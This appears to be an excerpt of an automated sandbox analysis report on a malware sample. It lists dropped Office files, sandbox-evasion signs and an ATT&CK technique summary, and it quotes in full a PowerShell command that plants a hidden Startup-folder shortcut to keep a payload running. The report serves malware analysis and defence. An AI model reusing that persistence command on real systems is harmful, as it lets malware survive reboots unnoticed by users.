    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sl-si.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-es.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.kk-kz.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems64_arm64x.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.id-id.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officesvcmgr.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fi-fi.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\policy.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pl-pl.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-file-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.vi-vn.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r64werhandler.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ko-kr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.en-gb.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.en-gb.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\appvcleaner.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R32.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIntegration.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.da-dk.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r64werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.vi-vn.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-xstate-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-localization-l1-2-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.uk-ua.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\inventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nl-nl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.et-ee.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppvIsvSubsystems32.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.de-de.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\InspectorOfficeGadget.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-br.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sk-sk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeC2RCom.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-string-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.it-it.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.de-de.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.lv-lv.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.da-dk.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ja-jp.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvVirtualization.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ms-my.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-time-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-utility-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.es-mx.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ar-sa.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.lt-lt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hr-hr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msvcp140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.nl-nl.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\c2r32werhandler.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RUI.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.id-id.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.ko-kr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-fr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems64_arm64x.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ru-ru.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hi-in.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\officeinventory.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\msix.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-br.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.et-ee.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\vccorlib140.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pt-pt.dllJump to dropped file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep count: 3899 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep count: 2490 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: 872C.tmp, 00000003.00000003.1430152859.0000000001D42000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: 872C.tmp, 00000003.00000003.1388768349.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1392280337.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1389143678.0000000003CDB000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1430994473.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, 872C.tmp, 00000003.00000003.1393216623.0000000003CD9000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.1665092686.00000248C2B67000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2016772440.00000248C2B99000.00000004.00000020.00020000.00000000.sdmp, OfficeClickToRun.exe, 00000006.00000003.2013710001.00000248C2B5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: OfficeClickToRun.exe, 00000006.00000003.2016772440.00000248C2B99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMWare, Inc.87:7021
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
    Source: C:\Users\user\Desktop\sBvrNv0wtb.exe Memory allocated: page read and write | page guard
    Source: C:\Users\user\AppData\Local\Temp\918D.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command " $StartupFolder = [System.Environment]::GetFolderPath('Startup') $ExePath = 'C:\Users\Public\Music\script\918D.tmp' $ShortcutPath = Join-Path -Path $StartupFolder -ChildPath 'AsMus.lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() "
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version=16.0.18526.20168 mediatype=cdn sourcetype=cdn o365homepremretail.excludedapps=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=true scenario=clientupdate
    Source: C:\Users\user\AppData\Local\Temp\918D.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -command " $startupfolder = [system.environment]::getfolderpath('startup') $exepath = 'c:\users\public\music\script\918d.tmp' $shortcutpath = join-path -path $startupfolder -childpath 'asmus.lnk' $wscriptshell = new-object -comobject wscript.shell $shortcut = $wscriptshell.createshortcut($shortcutpath) $shortcut.targetpath = $exepath $shortcut.workingdirectory = split-path -parent $exepath $shortcut.windowstyle = 7 $shortcut.description = 'asmus' $shortcut.save() "
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Process created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe officeclicktorun.exe platform=x86 culture=en-us productstoadd=o365homepremretail.16_en-us_x-none cdnbaseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 baseurl.16=http://officecdn.microsoft.com/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60 version.16=16.0.18526.20168 mediatype.16=cdn sourcetype.16=cdn o365homepremretail.excludedapps.16=groove bitnessmigration=false deliverymechanism=492350f6-3a01-4f97-b9c0-c7c6ddf67d60 flt.useoutlookshareaddon=unknown flt.useofficehelperaddon=unknown uninstallcentennial=true
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
    Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\872C.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Remote Access Functionality

    Source: Yara match File source: Process Memory Space: sBvrNv0wtb.exe PID: 7632, type: MEMORYSTR
    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: 1 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: 12 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: 11 Process Injection; 12 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: 3 Masquerading; 1 Modify Registry; 1 Disable or Modify Tools; 121 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Timestomp; 1 DLL Side-Loading
    Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
